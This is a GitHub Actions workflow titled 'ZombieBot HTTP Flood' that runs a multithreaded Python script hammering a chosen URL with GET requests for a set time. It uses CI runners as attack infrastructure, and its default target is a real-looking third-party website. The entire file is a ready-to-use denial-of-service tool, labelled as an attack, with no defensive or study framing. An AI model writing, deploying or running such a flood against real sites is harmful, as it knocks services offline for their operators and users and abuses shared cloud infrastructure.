name: ZombieBot HTTP Flood

on:
  workflow_dispatch:
    inputs:
      target:
        description: 'Target URL (include http[s]://)'
        required: true
        default: 'https://theoxfordengg.org'
      seconds:
        description: 'Duration of attack (seconds)'
        required: true
        default: '30'
      threads:
        description: 'Threads per runner'
        required: true
        default: '5'

jobs:
  ddos:
    runs-on: ubuntu-latest
    steps:
      - name: Install Python requests
        run: pip install requests
      - name: HTTP Flood
        run: |
          import threading, requests, time

          TARGET = "${{ github.event.inputs.target }}"
          SECONDS = int("${{ github.event.inputs.seconds }}")
          THREADS = int("${{ github.event.inputs.threads }}")
          END = time.time() + SECONDS

          def flood():
              while time.time() < END:
                  try:
                      requests.get(TARGET, timeout=3)
                  except:
                      pass

          print(f"Starting {THREADS} threads to attack {TARGET} for {SECONDS} seconds...")
          workers = [threading.Thread(target=flood) for _ in range(THREADS)]
          for w in workers: w.start()
          for w in workers: w.join()
          print("Attack complete.")
        shell: python
